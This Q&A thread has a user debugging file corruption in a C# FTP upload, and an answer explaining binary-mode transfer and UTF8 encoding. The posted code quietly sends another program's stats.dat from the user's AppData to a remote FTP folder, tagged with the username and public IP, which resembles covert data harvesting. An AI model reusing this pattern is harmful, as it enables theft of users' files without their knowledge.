# c# .dat upload file to ftp struggling to find a working example for my console app

Tags: c#, file, upload

okay so i want to send a file using c# 2010 to my drivehq ftp server I have tried multipul exampes in my console application some have uploaded files but are always corrupt other don't work can some one please help me on how I can upload a .dat file to ftp without corruption please help

the original size of file isn't the same as when upload and the file is corrupt

my source code

```
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Linq;
using System.Text;
using System.Collections.Specialized;
using System.Net;
using System.IO;

namespace ConsoleApplication1
{
class Program
{
    static void Main(string[] args)
    {

        string userName = Environment.UserName;

        if (File.Exists(@"C:\Users\" + userName + @"\AppData\Roaming\minefarm\stats.dat"))
        {
            Console.WriteLine("The file exists.");
            // Get the object used to communicate with the server.
            FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://ftp.drivehq.com/btc/" + userName + (GetPublicIpAddress() + ".dat"));
            request.Method = WebRequestMethods.Ftp.UploadFile;

            // This example assumes the FTP site uses anonymous logon.
            request.Credentials = new NetworkCredential("user", "pass");

            // Copy the contents of the file to the request stream.
            StreamReader sourceStream = new StreamReader(@"C:\Users\" + userName + @"\AppData\Roaming\minefarm\stats.dat"));
            byte[] fileContents = Encoding.UTF8.GetBytes(sourceStream.ReadToEnd());
            sourceStream.Close();
            request.ContentLength = fileContents.Length;

            Stream requestStream = request.GetRequestStream();
            requestStream.Write(fileContents, 0, fileContents.Length);
            requestStream.Close();

            FtpWebResponse response = (FtpWebResponse)request.GetResponse();

            Console.WriteLine("Upload File Complete, status {0}", response.StatusDescription);

            response.Close();

            System.Threading.Thread.Sleep(5000);


        }
    }


    private static string GetPublicIpAddress()
    {
        var request = (HttpWebRequest)WebRequest.Create("http://ifconfig.me");

        request.UserAgent = "curl"; // this simulate curl linux command

        string publicIPAddress;

        request.Method = "GET";
        using (WebResponse response = request.GetResponse())
        {
            using (var reader = new StreamReader(response.GetResponseStream()))
            {
                publicIPAddress = reader.ReadToEnd();
            }
        }

        return publicIPAddress.Replace("\n", "");

    }
}
}
```

Comment: How are you currently trying to do it? Please edit the question (and use code formatting) and show us the code please. See [ask]... welcome to StackOverflow.

Comment: will add my full source code now

Comment: @JeffBridgman please take a look at my code it upload the .dat file with the specified name but the files size is bigger and corrupt

Comment: @BlueMonkMN can u please heklp

Answer (score 1):

Are you using `System.Net.FtpWebRequest`?
Are you appropriately setting the value of the `UseBinary` property?

I suspect that if you are transferring the file but it is showing up with some corruption, you may not have properly set `UseBinary`.

After reviewing the newly posted code, I see that you have not set UseBinary = false even though you are transmitting what appears to be a text file. If the server is a different OS than the client it's normal for the size to be different because Windows represents the end of a line with a carriage return + line feed (`"\r\n"`), but Linux only uses a line feed (`"\n"`).

In order to provide more useful information, I think you need to find out and describe more about exactly how the file is corrupted. Load the files into binary editors and look for where they first differ.

**If** your file is not text, then the corruption may have been introduced by UTF8.GetBytes, which is intended for transforming data into text characters.

Comment: can u please take a loo at my code and help me please it uploads the file but it is larger and corrupt

Comment: @danole Take a look at the updated answer and if you need more help, please find & give more details on exactly what the first bit of corruption looks like at a binary level (many binary editors/viewers are available for free).